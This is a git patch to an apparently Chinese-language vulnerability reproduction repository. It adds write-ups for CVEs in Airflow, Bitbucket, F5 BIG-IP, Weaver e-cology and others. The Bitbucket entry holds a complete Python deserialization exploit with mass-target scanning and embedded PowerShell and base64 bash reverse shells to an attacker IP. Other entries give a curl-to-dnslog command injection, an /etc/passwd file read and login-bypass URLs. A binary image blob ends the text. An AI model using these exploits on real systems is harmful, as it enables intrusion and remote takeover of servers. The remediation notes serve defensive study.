From 8e4f0be1f75a71cffe4b2c2c558ad1cd4d03d9a7 Mon Sep 17 00:00:00 2001 From: Threekiii <472361400@qq.com> Date: Thu, 3 Aug 2023 08:54:06 +0800 Subject: [PATCH] =?UTF-8?q?=E6=9B=B4=E6=96=B0=E6=BC=8F=E6=B4=9E?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...OA E-Cology ofsLogin.jsp 前台任意用户登录漏洞.md | 29 +++ .../蓝凌OA sysSearchMain.do 远程命令执行漏洞.md | 2 - README.md | 24 ++- ...che Airflow 远程代码执行漏洞 CVE-2022-40127.md | 35 ++++ ...Data Center 远程代码执行漏洞 CVE-2022-26133.md | 196 ++++++++++++++++++ ...iControl REST身份认证绕过漏洞 CVE-2022-1388.md | 33 ++- ...rator kubeconfig 未授权访问漏洞 CVE-2023-22480 | 38 ---- .../images/image-20230801093324881.png | Bin 0 -> 131213 bytes ...r 及 Editor 任意代码执行漏洞 CVE-2023-27363.md | 27 +++ ...crosoft Outlook 权限提升漏洞 CVE-2023-23397.md | 119 +++++++++++ ... Commons Text 远程代码执行漏洞 CVE-2022-42889.md | 72 +++++++ .../Fastjson 远程代码执行漏洞 CVE-2022-25845.md | 57 +++++ .../ThinkPHP 命令执行漏洞 CNVD-2022-86535.md | 29 +++ .../向日葵 check 远程命令执行漏洞 CNVD-2022-10270.md | 47 ++++- 14 files changed, 665 insertions(+), 43 deletions(-) create mode 100644 OA产品漏洞/泛微OA E-Cology ofsLogin.jsp 前台任意用户登录漏洞.md create mode 100644 Web应用漏洞/Apache Airflow 远程代码执行漏洞 CVE-2022-40127.md create mode 100644 Web应用漏洞/Atlassian Bitbucket Data Center 远程代码执行漏洞 CVE-2022-26133.md delete mode 100644 Web应用漏洞/KubeOperator kubeconfig 未授权访问漏洞 CVE-2023-22480 create mode 100644 Web服务器漏洞/images/image-20230801093324881.png create mode 100644 其他漏洞/Foxit PDF Reader 及 Editor 任意代码执行漏洞 CVE-2023-27363.md create mode 100644 其他漏洞/Microsoft Outlook 权限提升漏洞 CVE-2023-23397.md create mode 100644 开发框架漏洞/Apache Commons Text 远程代码执行漏洞 CVE-2022-42889.md create mode 100644 开发框架漏洞/Fastjson 远程代码执行漏洞 CVE-2022-25845.md create mode 100644 开发框架漏洞/ThinkPHP 命令执行漏洞 CNVD-2022-86535.md diff --git a/OA产品漏洞/泛微OA E-Cology ofsLogin.jsp 前台任意用户登录漏洞.md b/OA产品漏洞/泛微OA E-Cology ofsLogin.jsp 前台任意用户登录漏洞.md new file mode 100644 index 0000000..fbc222d --- /dev/null +++ b/OA产品漏洞/泛微OA E-Cology ofsLogin.jsp 前台任意用户登录漏洞.md @@ -0,0 +1,29 @@ +# 泛微OA E-Cology ofsLogin.jsp 前台任意用户登录漏洞 + +## 漏洞描述 + +泛微 e-cology 前台任意用户登录漏洞:泛微 e-cology9 部分版本中存在前台任意用户登录漏洞。该漏洞允许未经身份验证的攻击者通过发送构造的请求触发漏洞,成功利用此漏洞的攻击者可登录任意用户。 + +## 漏洞影响 + +``` +部分 e-cology9 且补丁版本 < 10.57 +``` + +## 漏洞复现 + +poc1 + +``` +/mobile/plugin/1/ofsLogin.jsp?syscode=syscode×tamp=2&gopage=3&receiver=test&loginTokenFromThird= +``` + +poc2 + +``` +/mobile/plugin/1/ofsLogin.jsp?gopage=/wui/index.html&loginTokenFromThird=866fb3887a60239fc112354ee7ffc168&receiver=1&syscode=1×tamp +``` + +## 漏洞修复 + +目前,官方已发布修复建议,建议受影响的用户尽快升级至最新版本的补丁。下载地址:https://www.weaver.com.cn/cs/securityDownload.asp# \ No newline at end of file diff --git a/OA产品漏洞/蓝凌OA sysSearchMain.do 远程命令执行漏洞.md b/OA产品漏洞/蓝凌OA sysSearchMain.do 远程命令执行漏洞.md index 7acf10b..36f039e 100644 --- a/OA产品漏洞/蓝凌OA sysSearchMain.do 远程命令执行漏洞.md +++ b/OA产品漏洞/蓝凌OA sysSearchMain.do 远程命令执行漏洞.md @@ -33,8 +33,6 @@ method 为 editrParam。 对 fdParemNames 的内容进行了判空。如果不 将传入进来的 string 字符进行替换。将其载入字节数组缓冲区,在传递给 objectXmlDecoder。 在 objectXmlDecoder 中。就更明显了。典型的 xmlDecoder 反序列化。 整体流程只对 FdParameters 的内容进行了一些内容替换。 导致 xmlDecoder 反序列化漏洞。 - - 其中存在利用 custom.jsp 文件导致前台的命令执行以及文件上传,发送请求执行命令 ``` diff --git a/README.md b/README.md index 74f4621..60753eb 100644 --- a/README.md +++ b/README.md @@ -4,6 +4,7 @@ ## 0x01 项目导航 + * HW 高危漏洞(2021-2023) * 微信小程序反编译 * 蜜罐技术研究与识别 - CMS漏洞 @@ -76,11 +77,13 @@ * 禅道 12.4.2 CSRF漏洞 CNVD-2020-68552 * 禅道 12.4.2 后台任意文件上传漏洞 CNVD-C-2020-121325 * 禅道 V16.5 SQL 注入 CNVD-2022-42853 + * 禅道 项目管理系统远程命令执行漏洞 CNVD-2023-02709 * 齐博CMS V7 job.php 任意文件读取漏洞 - OA产品漏洞 * O2OA invoke 后台远程命令执行漏洞 CNVD-2020-18740 * O2OA open 后台任意文件读取漏洞 + * Untitled * 一米OA getfile.jsp 任意文件读取漏洞 * 万户OA DocumentEdit.jsp SQL注入漏洞 * 万户OA download_ftp.jsp 任意文件下载漏洞 @@ -112,6 +115,7 @@ * 泛微OA E-Cology jqueryFileTree.jsp 目录遍历漏洞 * 泛微OA E-cology KtreeUploadAction 任意文件上传 * 泛微OA E-Cology LoginSSO.jsp SQL注入漏洞 CNVD-2021-33202 + * 泛微OA E-Cology ofsLogin.jsp 前台任意用户登录漏洞 * 泛微OA E-Cology users.data 敏感信息泄漏 * 泛微OA E-Cology VerifyQuickLogin.jsp 任意管理员登录漏洞 * 泛微OA E-cology WorkflowServiceXml RCE @@ -134,6 +138,7 @@ * 用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923 * 用友 GRP-U8 UploadFileData 任意文件上传漏洞 * 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞 + * 用友 NC Cloud 远程代码执行漏洞 CNVD-C-2023-76801 * 用友 NC FileReceiveServlet 反序列化RCE漏洞 * 用友 NC NCFindWeb 任意文件读取漏洞 * 用友 NC XbrlPersistenceServlet反序列化 @@ -200,9 +205,12 @@ * Alibaba Canal config 云密钥信息泄露漏洞 * Alibaba Nacos secret.key默认密钥 未授权访问漏洞 * Alibaba Nacos 未授权访问漏洞 + * Alibaba Nacos 集群 Raft 反序列化漏洞 CNVD-2023-45001 * Alibaba otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592 + * Apache Airflow 远程代码执行漏洞 CVE-2022-40127 * Appspace jsonprequest SSRF漏洞 CVE-2021-27670 * Atlassian Bitbucket archive 远程命令执行漏洞 CVE-2022-36804 + * Atlassian Bitbucket Data Center 远程代码执行漏洞 CVE-2022-26133 * Atlassian Bitbucket 登录绕过漏洞 * Atlassian Confluence doenterpagevariables.action 远程命令执行漏洞 CVE-2021-26084 * Atlassian Confluence preview SSTI模版注入漏洞 CVE-2019-3396 @@ -300,6 +308,8 @@ * ShowDoc AdminUpdateController.class.php 任意文件上传漏洞 CVE-2021-36440 * ShowDoc PageController.class.php 任意文件上传漏洞 * ShowDoc 前台文件上传漏洞 + * Smartbi 登录绕过漏洞 + * Smartbi 远程命令执行漏洞 * SolarView Compact 命令注入漏洞 CVE-2022-40881 * SonarQube search_projects 项目信息泄露漏洞 * SonarQube values 信息泄露漏洞 CVE-2020-27986 @@ -377,6 +387,8 @@ * 深信服 日志中心 c.php 远程命令执行漏洞 * 深信服 行为感知系统 c.php 远程命令执行漏洞 * 瑞友 应用虚拟化系统 GetBSAppUrl SQL注入漏洞 + * 瑞友天翼应用虚拟化系统 AgentBoard.XGI 远程代码执行漏洞 + * 用友 畅捷通 T+ 前台远程命令执行漏洞 QVD-2023-13615 * 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞 * 用友 畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞 * 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞 @@ -401,6 +413,7 @@ * 金山 V8 终端安全系统 get_file_content.php 任意文件读取漏洞 * 金山 V8 终端安全系统 pdf_maker.php 命令执行漏洞 * 金笛 短信中间件Web版 log 后台任意文件下载漏洞 CNVD-2021-57336 + * 金蝶 K3Cloud BinaryFormatter 反序列化漏洞 * 银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437 * 银达汇智 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞 * 阿尔法科技 虚拟仿真实验室 未授权访问漏洞 @@ -424,6 +437,7 @@ * Apache Druid LoadData 任意文件读取漏洞 CVE-2021-36749 * Apache Druid 远程代码执行漏洞 CVE-2021-25646 * Apache Druid 远程代码执行漏洞 CVE-2021-26919 + * Apache Druid 远程代码执行漏洞 QVD-2023-9629 * Apache Flink 小于1.9.1远程代码执行 CVE-2020-17518 * Apache Flink 目录遍历漏洞 CVE-2020-17519 * Apache HTTPd 换行解析漏洞 CVE-2017-15715 @@ -438,7 +452,7 @@ * Apache OF Biz RMI Bypass RCE CVE 2021 29200 * Apache OFBiz RMI反序列化漏洞 CVE-2021-26295 * Apache ShenYu dashboardUser 账号密码泄漏漏洞 CVE-2021-37580 - * Apache Shiro 1.6.0 身份认证绕过漏洞 CVE-2020-13933 + * Apache Shiro 1.6.0 身份认证绕过漏洞 CVE-2020-13933 * Apache Shiro 小于1.2.4反序列化漏洞 CVE-2016-4437 * Apache SkyWalking graphql SQL注入漏洞 CVE-2020-9483 * Apache Solr JMX服务 RCE CVE-2019-12409 @@ -449,6 +463,7 @@ * Apache Solr stream.url 任意文件读取漏洞 * Apache Solr Velocity模板远程执行 CVE-2019-17558 * Apache Solr XXE 漏洞 CVE-2017-12629 + * Apache Solr 代码执行漏洞 CNVD-2023-27598 * Apache Solr 远程执行漏洞 CVE-2019-0193 * Apache Spark create 未授权访问漏洞 * Apache Spark doAs 远程命令执行漏洞 CVE-2022-33891 @@ -488,14 +503,18 @@ * K8s etcd未授权访问 - 其他漏洞 + * Foxit PDF Reader 及 Editor 任意代码执行漏洞 CVE-2023-27363 + * Microsoft Outlook 权限提升漏洞 CVE-2023-23397 * Microsoft Word 远程代码执行漏洞 CVE-2023-21716 * 微信客户端 远程命令执行漏洞 - 开发框架漏洞 + * Apache Commons Text 远程代码执行漏洞 CVE-2022-42889 * Apache OFBiz 反序列化 CVE-2021-30128 * Apache OfBiz 服务器端模板注入 SSTI * Apache OfBiz 远程代码执行 RCE * FastAdmin 远程代码执行漏洞 + * Fastjson 远程代码执行漏洞 CVE-2022-25845 * Jackson Databind SSRF RCE CVE 2020 36179 36182 * Jackson-databind远程代码执行 CVE-2019-12384 * jQuery XSS漏洞 CVE-2020-11022 11023 @@ -508,6 +527,8 @@ * Rails sprockets 任意文件读取漏洞 CVE-2018-3760 * Spring Cloud Config 目录遍历漏洞 CVE-2019-3799 * Spring Cloud Function SPEL 远程命令执行漏洞 + * Spring Framework 安全绕过漏洞 CVE-2023-20860 + * ThinkPHP 命令执行漏洞 CNVD-2022-86535 * XStream SSRF 反序列化漏洞 CVE-2020-26258 * XStream 任意文件删除 反序列化漏洞 CVE-2020-26259 - 开发语言漏洞 @@ -533,6 +554,7 @@ - 服务器应用漏洞 * Apache RocketMQ RCE 漏洞 CVE-2023-33246 + * Apache RocketMQ 远程代码执行漏洞 CVE-2023-37582 * ClickHouse API 数据库接口未授权访问漏洞 * Consul Docker images 空密码登录漏洞 CVE-2020-29564 * ElasticSearch Groovy 沙盒绕过 & 代码执行漏洞 CVE-2015-1427 diff --git a/Web应用漏洞/Apache Airflow 远程代码执行漏洞 CVE-2022-40127.md b/Web应用漏洞/Apache Airflow 远程代码执行漏洞 CVE-2022-40127.md new file mode 100644 index 0000000..f8cc745 --- /dev/null +++ b/Web应用漏洞/Apache Airflow 远程代码执行漏洞 CVE-2022-40127.md @@ -0,0 +1,35 @@ +# Apache Airflow 远程代码执行漏洞 CVE-2022-40127 + +## 漏洞描述 + +Apache Airflow 是一个可编程,调度和监控的工作流平台,基于有向无环图(DAG),Airflow 可以定义一组有依赖的任务,按照依赖依次执行。 + +当攻击者可访问到 Apache Airflow 的后台,且环境中存在默认 Example Dags,则可构造恶意请求借助 run_id 执行任意命令。 + +## 漏洞影响 + +``` +Airflow < 2.4.0 +``` + +## FOFA + +``` +app="APACHE-Airflow" +``` + +## 漏洞复现 + +登录 Airflow,在任意 DAG 行,点击 Actions 列的三角符号,再点击“Trigger DAG w/ config”。 + +进入配置,在 Run id (Optional) 处输入 Payload: + +``` +{"lab":"\";curl `uname`.****.dnslog.pw;\""} +``` + +在 DNSLog 查看回显。 + +## 修复建议 + +官方已发布版本 2.4.3,可升级 Apache Airflow 版本到 2.4.0 或以上,或者停用默认 Dags。 \ No newline at end of file diff --git a/Web应用漏洞/Atlassian Bitbucket Data Center 远程代码执行漏洞 CVE-2022-26133.md b/Web应用漏洞/Atlassian Bitbucket Data Center 远程代码执行漏洞 CVE-2022-26133.md new file mode 100644 index 0000000..3245186 --- /dev/null +++ b/Web应用漏洞/Atlassian Bitbucket Data Center 远程代码执行漏洞 CVE-2022-26133.md @@ -0,0 +1,196 @@ +# Atlassian Bitbucket Data Center 远程代码执行漏洞 CVE-2022-26133 + +## 漏洞描述 + +Atlassian Bitbucket Data Center 存在远程代码执行漏洞。该漏洞是由于Atlassian Bitbucket Data Center 中的 Hazelcast 接口功能未对用户数据进行有效过滤,导致存在反序列化漏洞而引起的。攻击者利用该漏洞可以构造恶意数据远程执行任意代码。只有当 Atlassian Bitbucket Data Center 以 Cluster 模式安装时,才可能受该漏洞影响。 + +## 漏洞影响 + +``` +Atlassian Bitbucket Data Center >= 5.14.x +Atlassian Bitbucket Data Center 6.x +Atlassian Bitbucket Data Center < 7.6.14 +Atlassian Bitbucket Data Center < 7.16.x +Atlassian Bitbucket Data Center < 7.17.6 +Atlassian Bitbucket Data Center < 7.18.4 +Atlassian Bitbucket Data Center < 7.19.4 +Atlassian Bitbucket Data Center 7.20.0 +``` + +## FOFA + +``` +app="ATLASSIAN-Bitbucket" +``` + +## 漏洞复现 + +exp: + +``` +python3 CVE-2022-26133.py -u http://192.168.110.136:7990 -f target.txt +``` + +``` +#!/usr/bin/env python3 +## -*- coding: utf_8 -*- +## @Time : 2022/5/7 0007 9:58 + +from urllib.parse import urlparse +import argparse +import requests +import logging +import socket +import time + +requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) + +''' +Atlassian Bitbucket Data Center反序列化漏洞(CVE-2022-26133) + +## Windows Reverse Shell(未免杀) +command: powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('192.168.1.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\" + +## Linux Reverse Shell +command: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMC4xLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i} + +''' + + +class CVE_2022_26133: + def __init__(self, target): + parse = urlparse(target) + self.url = parse.scheme + "://" + parse.netloc + self.log_init() + self.timeout = 3 + self.proxies = None + ## self.proxies = {"http": "http://127.0.0.1:8888", "https": "http://127.0.0.1:8888"} + + def log_init(self): + LOG_FORMAT = "%(asctime)s - %(levelname)s - %(message)s" + logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT) + + def str_to_hex(self, param): + ll = [] + for i in param: + ll.append(hex(ord(i)).split("x")[1]) + return "".join(ll) + + def dec_to_hex(self, param, n): + if n == 4: + return '{:04x}'.format(param) + elif n == 8: + return '{:08x}'.format(param) + + def get_socket_connect(self): + try: + parse = urlparse(self.url) + target = parse.netloc.split(":")[0] + ## default port + port = 5701 + + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + socket.setdefaulttimeout(self.timeout) + + sock.connect((target, port)) + return sock + except Exception as msg: + logging.critical("target is not reachable, " + str(msg)) + + def generate_payload(self, cluster, command): + + payload = cluster.hex() + payload += "FFFFFF9C" + + ## yso cb1 payload + payload += "ACED0005737200176A6176612E7574696C2E5072696F72697479517565756594DA30B4FB3F82B103000249000473697A654C000A636F6D70617261746F727400164C6A6176612F7574696C2F436F6D70617261746F723B7870000000027372002B6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E436F6D70617261746F72E3A188EA7322A4480200024C000A636F6D70617261746F7271007E00014C000870726F70657274797400124C6A6176612F6C616E672F537472696E673B78707372003F6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E636F6D70617261746F72732E436F6D70617261626C65436F6D70617261746F72FBF49925B86EB13702000078707400106F757470757450726F706572746965737704000000037372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000649000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D6571007E00044C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF757200035B5B424BFD19156767DB37020000787000000002757200025B42ACF317F8060854E00200007870" + payload += self.dec_to_hex((1684 + len(command)), 8) + payload += "CAFEBABE0000003200390A0003002207003707002507002601001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C756505AD2093F391DDEF3E0100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100354C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B0100097472616E73666F726D010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B01000868616E646C6572730100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A457863657074696F6E730700270100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07002801003379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F6164010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C65740100146A6176612F696F2F53657269616C697A61626C65010039636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F5472616E736C6574457863657074696F6E01001F79736F73657269616C2F7061796C6F6164732F7574696C2F476164676574730100083C636C696E69743E0100116A6176612F6C616E672F52756E74696D6507002A01000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B0C002C002D0A002B002E01" + payload += self.dec_to_hex((len(command)), 4) + payload += self.str_to_hex(command) + payload += "08003001000465786563010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0C003200330A002B003401000D537461636B4D61705461626C6501001D79736F73657269616C2F50776E6572383931393230313938343538303001001F4C79736F73657269616C2F50776E657238393139323031393834353830303B002100020003000100040001001A000500060001000700000002000800040001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000002F000E0000000C000100000005000F003800000001001300140002000C0000003F0000000300000001B100000002000D00000006000100000034000E00000020000300000001000F0038000000000001001500160001000000010017001800020019000000040001001A00010013001B0002000C000000490000000400000001B100000002000D00000006000100000038000E0000002A000400000001000F003800000000000100150016000100000001001C001D000200000001001E001F00030019000000040001001A00080029000B0001000C00000024000300020000000FA70003014CB8002F1231B6003557B1000000010036000000030001030002002000000002002100110000000A000100020023001000097571007E0010000001D4CAFEBABE00000032001B0A0003001507001707001807001901001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C75650571E669EE3C6D47180100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010003466F6F01000C496E6E6572436C61737365730100254C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F3B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07001A01002379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F0100106A6176612F6C616E672F4F626A6563740100146A6176612F696F2F53657269616C697A61626C6501001F79736F73657269616C2F7061796C6F6164732F7574696C2F47616467657473002100020003000100040001001A000500060001000700000002000800010001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000003C000E0000000C000100000005000F001200000002001300000002001400110000000A000100020016001000097074000450776E72707701007871007E000D78" + + ## logging.info("payload: " + payload) + return payload + + def verify(self, Batch=False): + + logging.debug("Checking " + self.url) + + try: + sock = self.get_socket_connect() + if sock is not None: + ## get ClusterName + data = "000000027361" + sock.send(bytes.fromhex(data)) + ClusterName = sock.recv(4) + sock.recv(1024) + sock.close() + + if len(ClusterName) != 0: + logging.info("\033[0;36mTarget is vulnerable.\033[0m") + if Batch != False: + with open("success.txt", "a+") as fo: + fo.write(self.url + "\n") + fo.close() + + return ClusterName + + except Exception as msg: + logging.critical(msg) + + def exploit(self, command): + ClusterName = self.verify() + if ClusterName is not None: + try: + sock = self.get_socket_connect() + if sock is not None: + logging.info("command => " + command) + payload = self.generate_payload(ClusterName, command) + + sock.send(bytes.fromhex(payload)) + time.sleep(0.5) + res = sock.recv(1024) + sock.close() + + if len(res) != 0: + logging.info("payload send success, check it.") + + except Exception as msg: + if isinstance(msg, ConnectionResetError): + logging.warning("ConnectionResetError: Payload maybe execute successful once target is Linux, Check it.") + else: + logging.critical(msg) + + +if __name__ == '__main__': + + parser = argparse.ArgumentParser() + parser.add_argument('-u', dest='url', help='input target url, eg: http://192.168.1.1:7990/') + parser.add_argument('--verify', action='store_true', default=False, help='verify mode, verify if target is vulnerable.') + parser.add_argument('-c', dest='command', help='exploit mode, eg: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMC4xLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}') + parser.add_argument('-f', dest='file', help='verify targets in the file if vulnerable.') + args = parser.parse_args() + + print(""" + ______ _______ ____ ___ ____ ____ ____ __ _ __________ + / ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ \ / /_ / |___ /___ / + | | \ \ / /| _| _____ __) | | | |__) | __) |____ __) | '_ \| | |_ \ |_ \ + | |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____/ __/| (_) | |___) |__) | + \____| \_/ |_____| |_____|\___/_____|_____| |_____|\___/|_|____/____/ + """) + + if args.verify: + CVE_2022_26133(args.url).verify() + elif args.file: + with open(args.file, 'r') as f: + targets = f.readlines() + f.close() + for target in targets: + CVE_2022_26133(target.strip()).verify(True) + elif args.command: + CVE_2022_26133(args.url).exploit(args.command) +``` + +## 漏洞修复 + +当前官方已发布最新版本,建议受影响的用户及时更新升级到最新版本。链接如下:https://www.atlassian.com/software/bitbucket/download-archives diff --git a/Web应用漏洞/F5 BIG-IP iControl REST身份认证绕过漏洞 CVE-2022-1388.md b/Web应用漏洞/F5 BIG-IP iControl REST身份认证绕过漏洞 CVE-2022-1388.md index b4c7bf7..d367c8c 100644 --- a/Web应用漏洞/F5 BIG-IP iControl REST身份认证绕过漏洞 CVE-2022-1388.md +++ b/Web应用漏洞/F5 BIG-IP iControl REST身份认证绕过漏洞 CVE-2022-1388.md @@ -35,4 +35,35 @@ Content-Length: 39 {"command":"run","utilCmdArgs":"-c id"} ``` -![](./images/202205241449854.png) \ No newline at end of file +![](./images/202205241449854.png) + +文件读取: + +``` +https://your-ip/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd +RCE +``` + +RCE: + +``` +https://your-ip/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin +``` + +检测脚本:https://github.com/jheeree/CVE-2022-1388-checker/blob/main/CVE-2022-1388.sh + +使用方法: + +``` +./CVE-2022-1388.sh hosts.txt +``` + +## 漏洞修复 + +建议升级至最新版本或可参考官方修复建议 Recommended Actions:https://support.f5.com/csp/article/K23605346 + +在受影响的版本内可执行以下步骤以缓解攻击: + +- 通过自身 IP 地址阻止 iControl REST 访问。 +- 通过管理界面阻止 iControl REST 访问。 +- 修改 BIG-IP httpd 配置。 \ No newline at end of file diff --git a/Web应用漏洞/KubeOperator kubeconfig 未授权访问漏洞 CVE-2023-22480 b/Web应用漏洞/KubeOperator kubeconfig 未授权访问漏洞 CVE-2023-22480 deleted file mode 100644 index 6da281f..0000000 --- a/Web应用漏洞/KubeOperator kubeconfig 未授权访问漏洞 CVE-2023-22480 +++ /dev/null @@ -1,38 +0,0 @@ -# KubeOperator kubeconfig 未授权访问漏洞 CVE-2023-22480 - -## 漏洞描述 - -KubeOperator 是一个开源的轻量级 Kubernetes 发行版,专注于帮助企业规划、部署和运营生产级别的 Kubernetes 集群。CVE-2023-22480 中,由于下载kubeconfig的路径不需要身份认证,导致攻击者可直接下载kubeconfig获取相关敏感信息。 - -## 漏洞影响 - -KubeOperator < 3.16.4 - -## FOFA - -``` -app="KubeOperator" -``` - -## 漏洞复现 - -登陆页面 - -![image-20230504140910659](images/image-20230504140910659.png) - -在补丁中修复了配置文件下载接口的未授权 - -![image-20230504140927095](images/image-20230504140927095.png) - -当集群存在时可通过接口未授权下载配置文件 - -![image-20230504140945600](images/image-20230504140945600.png) - -验证POC (k8s为集群名称,不固定) - -``` -/api/v1/clusters/kubeconfig/k8s -``` - -![image-20230504141007260](images/image-20230504141007260.png) - diff --git a/Web服务器漏洞/images/image-20230801093324881.png b/Web服务器漏洞/images/image-20230801093324881.png new file mode 100644 index 0000000000000000000000000000000000000000..a86293154c4b26d03c1b96874ee44d4168c3a959 GIT binary patch literal 131213 zcmZU)WmFwOvjsZ12Dji4+zA}qHMqOGySoPxAOv@J5AG7&-QC^YdE~D5-TUr+f6h8< zW>!~EcUASSU3-4W%Zh)3$At#~;FH8R5k&xi#RmY0ZdmY-EAey$n*cxzNQek3yQiJ3 zdT1-pKEqs$H+8RoeK$}O5ddpYKnG#Wbka3cCPBqd&Bs-1$9}C7r3KaXI9mOc&eyIM zJx#4G;%}gHkG2jTtms~(ts21yE0dP)Q6|9eXawrLbDFv~+g5bA%P|MyS5zY`L6q8F2@ zNZ@}Dc03bEEZ}cj06yPZ{=cjU4WtK}()@qSehia`v~(h_FAWL*f3FipFf$c+NdI4} ztp3ccoLGKcWV*vcUh(jUE83xe*)+^M5abB2izh0@VL+O0tOhDer)`6Z`l7 zJ*5U}L6q7k92_H7rT;rw3rT9GJ^%!fn+*TI_oWzH$?8px<-_n!eK*ej4jI-D5z=UM z$}NsQ=3hqoqpJ*4B9O3wn&ntCmhqbTB`U?rb#T=KcDzkgBDIcHa5lz3RsY(O9<o99vx9cH?q3X4(J31Na&czk`@jPUG3Q-{I`Fc2}$$IfNh-pNru;WC?$ZUCY$%~HBL{p+7biEgAE_-QJ7;8A z*S25pe_r8Pf_neQIk%V)!HpuYe?SWAyQ#}>p4Y7G*#xc_97aK^VK)vZjmX%828Bs` z5LJ5-O}X#v@!ACsLE;3zP#hVJB1qx$COLofD6-#QRpYVh{g0#m>cWA@dL2(!Q3_B| z-Kvp^RG3w^Pt4W}Znm?#Iki#8VNu6i3wqYa9OjsW?YH(%O+9wgimBA4_prH(d65c{ zSqF@SVZ=j%AzytD)b|F<8C^Iyoy@Q(I7Zq|4g2+-wsBSO%akb%NnRFM z&yW6_a2;4jc}-ohQ6Qh#z-8!K>&@vpsn7uAdz+_RJiG__^?R%~E{`rHTK+Vz@D@v= zrM~`UmNKnEFk~^VJe%MZYHgj>qF>+^Uk#bhkB;V6%8CEmt#twg^?@v`0A^P+OiNpD zx?`gH2jLSbr6>aO0d8}w5=x4&vHi_~OqoSAB0ITJ2sP~e0-lO|+k1;^nL%SkxN+LJ zq13hbhNv^qK7GbUP)H%V_e~~(;^z_gLA;*qX%=-zA8*} zUQxR3$laD%balUi5R}i`2isntpP!{;L4U>P-*r7t#bOC&N>;u6!ihd_Z*9G7-@P`V zDflbo?Pxl6Pzj|(grQF+IZV-gtcWrQL{nGNg!i9q2wsT{DYXOM_BOOnNmcjzxs(i)qA^&>6i-{Lw&LpbKZ1|7G+(v#@)(1M71yN=I 